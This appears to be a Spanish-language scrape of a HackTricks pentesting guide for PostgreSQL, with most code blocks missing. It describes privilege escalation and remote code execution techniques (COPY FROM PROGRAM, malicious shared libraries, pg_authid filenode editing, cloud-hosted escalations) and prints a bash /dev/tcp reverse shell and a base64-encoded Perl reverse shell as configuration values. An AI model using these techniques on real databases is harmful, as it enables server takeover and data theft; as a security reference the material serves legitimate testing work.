5432,5433 - Pentesting Postgresql
Last updated
Last updated
Utiliza Trickest para construir y automatizar flujos de trabajo fácilmente, impulsados por las herramientas comunitarias más avanzadas del mundo. Obtén acceso hoy:
PostgreSQL se describe como un sistema de base de datos objeto-relacional que es de código abierto. Este sistema no solo utiliza el lenguaje SQL, sino que también lo mejora con características adicionales. Sus capacidades le permiten manejar una amplia gama de tipos de datos y operaciones, lo que lo convierte en una opción versátil para desarrolladores y organizaciones.
Puerto por defecto: 5432, y si este puerto ya está en uso, parece que postgresql utilizará el siguiente puerto (probablemente 5433) que no está en uso.
Si al ejecutar \list
encuentras una base de datos llamada rdsadmin
, sabes que estás dentro de una base de datos postgresql de AWS.
Para más información sobre cómo abusar de una base de datos PostgreSQL consulta:
PostgreSQL injectionSegún esta investigación, cuando un intento de conexión falla, dblink
lanza una excepción sqlclient_unable_to_establish_sqlconnection
que incluye una explicación del error. Ejemplos de estos detalles se enumeran a continuación.
El host está inactivo
DETAIL: no se pudo conectar al servidor: No hay ruta al host ¿Está el servidor en el host "1.2.3.4" y aceptando conexiones TCP/IP en el puerto 5678?
El puerto está cerrado
El puerto está abierto
o
El puerto está abierto o filtrado
En las funciones PL/pgSQL, actualmente no es posible obtener detalles de excepciones. Sin embargo, si tienes acceso directo al servidor PostgreSQL, puedes recuperar la información necesaria. Si extraer nombres de usuario y contraseñas de las tablas del sistema no es factible, puedes considerar utilizar el método de ataque de lista de palabras discutido en la sección anterior, ya que podría potencialmente dar resultados positivos.
rolsuper
El rol tiene privilegios de superusuario
rolinherit
El rol hereda automáticamente los privilegios de los roles de los que es miembro
rolcreaterole
El rol puede crear más roles
rolcreatedb
El rol puede crear bases de datos
rolcanlogin
El rol puede iniciar sesión. Es decir, este rol puede ser dado como el identificador de autorización de sesión inicial
rolreplication
El rol es un rol de replicación. Un rol de replicación puede iniciar conexiones de replicación y crear y eliminar slots de replicación.
rolconnlimit
Para roles que pueden iniciar sesión, esto establece el número máximo de conexiones concurrentes que este rol puede hacer. -1 significa sin límite.
rolpassword
No es la contraseña (siempre se lee como ********
)
rolvaliduntil
Tiempo de expiración de la contraseña (solo se usa para autenticación de contraseña); nulo si no hay expiración
rolbypassrls
El rol elude cada política de seguridad a nivel de fila, consulta Sección 5.8 para más información.
rolconfig
Valores predeterminados específicos del rol para variables de configuración en tiempo de ejecución
oid
ID del rol
Si eres miembro de pg_execute_server_program
puedes ejecutar programas
Si eres miembro de pg_read_server_files
puedes leer archivos
Si eres miembro de pg_write_server_files
puedes escribir archivos
Ten en cuenta que en Postgres un usuario, un grupo y un rol son lo mismo. Solo depende de cómo lo uses y si permites que inicie sesión.
Desde este commit los miembros del grupo definido DEFAULT_ROLE_READ_SERVER_FILES
(llamado pg_read_server_files
) y super usuarios pueden usar el método COPY
en cualquier ruta (consulta convert_and_check_filename
en genfile.c
):
Recuerda que si no eres superusuario pero tienes los permisos CREATEROLE, puedes hacerte miembro de ese grupo:
Hay otras funciones de postgres que se pueden usar para leer un archivo o listar un directorio. Solo superusuarios y usuarios con permisos explícitos pueden usarlas:
Puedes encontrar más funciones en https://www.postgresql.org/docs/current/functions-admin.html
Solo super usuarios y miembros de pg_write_server_files
pueden usar copy para escribir archivos.
Recuerda que si no eres superusuario pero tienes los permisos CREATEROLE
, puedes hacerte miembro de ese grupo:
Recuerda que COPY no puede manejar caracteres de nueva línea, por lo tanto, incluso si estás usando una carga útil en base64 necesitas enviar una línea única.
Una limitación muy importante de esta técnica es que copy
no se puede usar para escribir archivos binarios ya que modifica algunos valores binarios.
Sin embargo, hay otras técnicas para cargar grandes archivos binarios:
Big Binary Files Upload (PostgreSQL)Consejo de bug bounty: regístrate en Intigriti, una plataforma de bug bounty premium creada por hackers, para hackers! Únete a nosotros en https://go.intigriti.com/hacktricks hoy, y comienza a ganar recompensas de hasta $100,000!
Si tienes los permisos necesarios para leer y escribir archivos del servidor PostgreSQL, puedes actualizar cualquier tabla en el servidor sobrescribiendo el nodo de archivo asociado en el directorio de datos de PostgreSQL. Más sobre esta técnica aquí.
Pasos requeridos:
Obtén el directorio de datos de PostgreSQL
Nota: Si no puedes recuperar la ruta del directorio de datos actual de la configuración, puedes consultar la versión principal de PostgreSQL a través de la consulta SELECT version()
e intentar forzar la ruta. Las rutas comunes del directorio de datos en instalaciones de PostgreSQL en Unix son /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/
. Un nombre de clúster común es main
. 2. Obtén una ruta relativa al nodo de archivo, asociado con la tabla objetivo
Esta consulta debería devolver algo como base/3/1337
. La ruta completa en el disco será $DATA_DIRECTORY/base/3/1337
, es decir, /var/lib/postgresql/13/main/base/3/1337
. 3. Descarga el nodo de archivo a través de las funciones lo_*
Obtén el tipo de dato, asociado con la tabla objetivo
Usa el Editor de Nodo de Archivo de PostgreSQL para editar el nodo de archivo; establece todos los flags booleanos rol*
a 1 para permisos completos.
(Opcional) Limpia la caché de la tabla en memoria ejecutando una consulta SQL costosa
Ahora deberías ver los valores de la tabla actualizados en PostgreSQL.
También puedes convertirte en superadministrador editando la tabla pg_authid
. Consulta la siguiente sección.
Desde la versión 9.3, solo superusuarios y miembros del grupo pg_execute_server_program
pueden usar copy para RCE (ejemplo con exfiltración:
Ejemplo para exec:
Recuerda que si no eres superusuario pero tienes los permisos CREATEROLE
puedes hacerte miembro de ese grupo:
O usa el módulo multi/postgres/postgres_copy_from_program_cmd_exec
de metasploit.
Más información sobre esta vulnerabilidad aquí. Aunque se reportó como CVE-2019-9193, Postgres declaró que esto era una característica y no será corregido.
Una vez que has aprendido del post anterior cómo subir archivos binarios, podrías intentar obtener RCE subiendo una extensión de postgresql y cargándola.
RCE with PostgreSQL ExtensionsLos siguientes vectores de RCE son especialmente útiles en contextos de SQLi restringidos, ya que todos los pasos se pueden realizar a través de declaraciones SELECT anidadas.
El archivo de configuración de PostgreSQL es escribible por el usuario postgres, que es quien ejecuta la base de datos, así que como superusuario, puedes escribir archivos en el sistema de archivos, y por lo tanto puedes sobrescribir este archivo.
Más información sobre esta técnica aquí.
El archivo de configuración tiene algunos atributos interesantes que pueden llevar a RCE:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Ruta a la clave privada de la base de datos
ssl_passphrase_command = ''
Si el archivo privado está protegido por contraseña (encriptado), postgresql ejecutará el comando indicado en este atributo.
ssl_passphrase_command_supports_reload = off
Si este atributo está activado, el comando ejecutado si la clave está protegida por contraseña se ejecutará cuando pg_reload_conf()
sea ejecutado.
Entonces, un atacante necesitará:
Volcar la clave privada del servidor
Encriptar la clave privada descargada:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
Sobrescribir
Volcar la configuración actual de postgresql
Sobrescribir la configuración con la configuración de los atributos mencionados:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
Ejecutar pg_reload_conf()
Mientras probaba esto, noté que esto solo funcionará si el archivo de clave privada tiene privilegios 640, es propiedad de root y del grupo ssl-cert o postgres (para que el usuario postgres pueda leerlo), y está ubicado en /var/lib/postgresql/12/main.
Más información sobre esta configuración y sobre WAL aquí.
Otro atributo en el archivo de configuración que es explotable es archive_command
.
Para que esto funcione, la configuración archive_mode
debe estar 'on'
o 'always'
. Si eso es cierto, entonces podríamos sobrescribir el comando en archive_command
y forzarlo a ejecutarse a través de las operaciones WAL (write-ahead logging).
Los pasos generales son:
Verificar si el modo de archivo está habilitado: SELECT current_setting('archive_mode')
Sobrescribir archive_command
con la carga útil. Por ejemplo, un shell inverso: archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
Recargar la configuración: SELECT pg_reload_conf()
Forzar la operación WAL para que se ejecute, lo que llamará al comando de archivo: SELECT pg_switch_wal()
o SELECT pg_switch_xlog()
para algunas versiones de Postgres
Más información sobre esta técnica aquí.
Este vector de ataque aprovecha las siguientes variables de configuración:
session_preload_libraries
-- bibliotecas que serán cargadas por el servidor PostgreSQL en la conexión del cliente.
dynamic_library_path
-- lista de directorios donde el servidor PostgreSQL buscará las bibliotecas.
Podemos establecer el valor de dynamic_library_path
a un directorio, escribible por el usuario postgres
que ejecuta la base de datos, por ejemplo, el directorio /tmp/
, y subir un objeto .so
malicioso allí. A continuación, forzaremos al servidor PostgreSQL a cargar nuestra biblioteca recién subida incluyéndola en la variable session_preload_libraries
.
Los pasos del ataque son:
Descargar el postgresql.conf
original
Incluir el directorio /tmp/
en el valor de dynamic_library_path
, por ejemplo, dynamic_library_path = '/tmp:$libdir'
Incluir el nombre de la biblioteca maliciosa en el valor de session_preload_libraries
, por ejemplo, session_preload_libraries = 'payload.so'
Verificar la versión principal de PostgreSQL a través de la consulta SELECT version()
Compilar el código de la biblioteca maliciosa con el paquete de desarrollo correcto de PostgreSQL. Código de ejemplo:
Compilando el código:
Subir el postgresql.conf
malicioso, creado en los pasos 2-3, y sobrescribir el original
Subir el payload.so
del paso 5 al directorio /tmp
Recargar la configuración del servidor reiniciando el servidor o invocando la consulta SELECT pg_reload_conf()
En la próxima conexión a la base de datos, recibirás la conexión de shell inverso.
De acuerdo con la documentación: Los roles que tienen el privilegio CREATEROLE
pueden conceder o revocar la membresía en cualquier rol que no sea un superusuario.
Así que, si tienes permiso CREATEROLE
, podrías concederte acceso a otros roles (que no son superusuario) que pueden darte la opción de leer y escribir archivos y ejecutar comandos:
Los usuarios con este rol también pueden cambiar las contraseñas de otros no superusuarios:
Es bastante común encontrar que los usuarios locales pueden iniciar sesión en PostgreSQL sin proporcionar ninguna contraseña. Por lo tanto, una vez que hayas reunido permisos para ejecutar código, puedes abusar de estos permisos para otorgarte el rol de SUPERUSER
:
Esto suele ser posible debido a las siguientes líneas en el pg_hba.conf
archivo:
En este informe se explica cómo fue posible privesc en Postgres GCP abusando del privilegio ALTER TABLE que se otorgó al usuario.
Cuando intentas hacer que otro usuario sea propietario de una tabla, deberías recibir un error que lo impida, pero aparentemente GCP le dio esa opción al usuario postgres que no es superusuario en GCP:
Uniendo esta idea con el hecho de que cuando se ejecutan los comandos INSERT/UPDATE/ANALYZE en una tabla con una función de índice, la función es llamada como parte del comando con los permisos del propietario de la tabla. Es posible crear un índice con una función y dar permisos de propietario a un superusuario sobre esa tabla, y luego ejecutar ANALYZE sobre la tabla con la función maliciosa que podrá ejecutar comandos porque está utilizando los privilegios del propietario.
Comience creando una nueva tabla.
Inserte contenido irrelevante en la tabla para proporcionar datos para la función de índice.
Desarrolle una función de índice maliciosa que contenga una carga útil de ejecución de código, permitiendo que se ejecuten comandos no autorizados.
ALTERE el propietario de la tabla a "cloudsqladmin", que es el rol de superusuario de GCP utilizado exclusivamente por Cloud SQL para gestionar y mantener la base de datos.
Realice una operación ANALYZE en la tabla. Esta acción obliga al motor de PostgreSQL a cambiar al contexto de usuario del propietario de la tabla, "cloudsqladmin". En consecuencia, la función de índice maliciosa se llama con los permisos de "cloudsqladmin", lo que permite la ejecución del comando de shell previamente no autorizado.
En PostgreSQL, este flujo se ve algo así:
Entonces, la tabla shell_commands_results
contendrá la salida del código ejecutado:
Algunas instancias de postgresql mal configuradas pueden permitir el inicio de sesión de cualquier usuario local, es posible iniciar sesión desde 127.0.0.1 utilizando la dblink
function:
Tenga en cuenta que para que la consulta anterior funcione la función dblink
necesita existir. Si no existe, podría intentar crearla con
Si tienes la contraseña de un usuario con más privilegios, pero el usuario no tiene permitido iniciar sesión desde una IP externa, puedes usar la siguiente función para ejecutar consultas como ese usuario:
Es posible verificar si esta función existe con:
En este informe, los pentesters pudieron escalar privilegios dentro de una instancia de postgres proporcionada por IBM, porque encontraron esta función con la bandera SECURITY DEFINER:
Como se explica en la documentación, una función con SECURITY DEFINER se ejecuta con los privilegios del usuario que la posee. Por lo tanto, si la función es vulnerable a SQL Injection o está realizando algunas acciones privilegiadas con parámetros controlados por el atacante, podría ser abusada para escalar privilegios dentro de postgres.
En la línea 4 del código anterior se puede ver que la función tiene la bandera SECURITY DEFINER.
Y luego ejecutar comandos:
PL/pgSQL es un lenguaje de programación completamente funcional que ofrece un mayor control procedural en comparación con SQL. Permite el uso de bucles y otras estructuras de control para mejorar la lógica del programa. Además, las sentencias SQL y los triggers tienen la capacidad de invocar funciones que se crean utilizando el lenguaje PL/pgSQL. Esta integración permite un enfoque más completo y versátil para la programación y automatización de bases de datos. Puedes abusar de este lenguaje para pedirle a PostgreSQL que realice fuerza bruta en las credenciales de los usuarios.
PL/pgSQL Password BruteforceEl siguiente vector de privesc es especialmente útil en contextos de SQLi restringidos, ya que todos los pasos se pueden realizar a través de sentencias SELECT anidadas.
Si puedes leer y escribir archivos del servidor PostgreSQL, puedes convertirte en superusuario sobrescribiendo el filenode en disco de PostgreSQL, asociado con la tabla interna pg_authid
.
Lee más sobre esta técnica aquí.
Los pasos del ataque son:
Obtener el directorio de datos de PostgreSQL
Obtener una ruta relativa al filenode, asociado con la tabla pg_authid
Descargar el filenode a través de las funciones lo_*
Obtener el tipo de dato, asociado con la tabla pg_authid
Usar el Editor de Filenode de PostgreSQL para editar el filenode; establecer todos los flags booleanos rol*
a 1 para permisos completos.
Volver a subir el filenode editado a través de las funciones lo_*
, y sobrescribir el archivo original en el disco
(Opcional) Limpiar la caché de la tabla en memoria ejecutando una consulta SQL costosa
Ahora deberías tener los privilegios de un superadmin completo.
Dentro del archivo postgresql.conf puedes habilitar los registros de postgresql cambiando:
Luego, reinicie el servicio.
pgadmin es una plataforma de administración y desarrollo para PostgreSQL. Puede encontrar contraseñas dentro del archivo pgadmin4.db Puede desencriptarlas utilizando la función decrypt dentro del script: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py
La autenticación del cliente en PostgreSQL se gestiona a través de un archivo de configuración llamado pg_hba.conf. Este archivo contiene una serie de registros, cada uno especificando un tipo de conexión, rango de direcciones IP del cliente (si corresponde), nombre de la base de datos, nombre de usuario y el método de autenticación a utilizar para las conexiones coincidentes. El primer registro que coincida con el tipo de conexión, dirección del cliente, base de datos solicitada y nombre de usuario se utiliza para la autenticación. No hay un respaldo o alternativa si la autenticación falla. Si no hay ningún registro que coincida, se deniega el acceso.
Los métodos de autenticación basados en contraseña disponibles en pg_hba.conf son md5, crypt y password. Estos métodos difieren en cómo se transmite la contraseña: con hash MD5, cifrada con crypt o en texto claro. Es importante tener en cuenta que el método crypt no se puede utilizar con contraseñas que han sido cifradas en pg_authid.
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:
Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)
6. Vuelve a cargar el nodo de archivo editado a través de las funciones lo_*
, y sobrescribe el archivo original en el disco
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)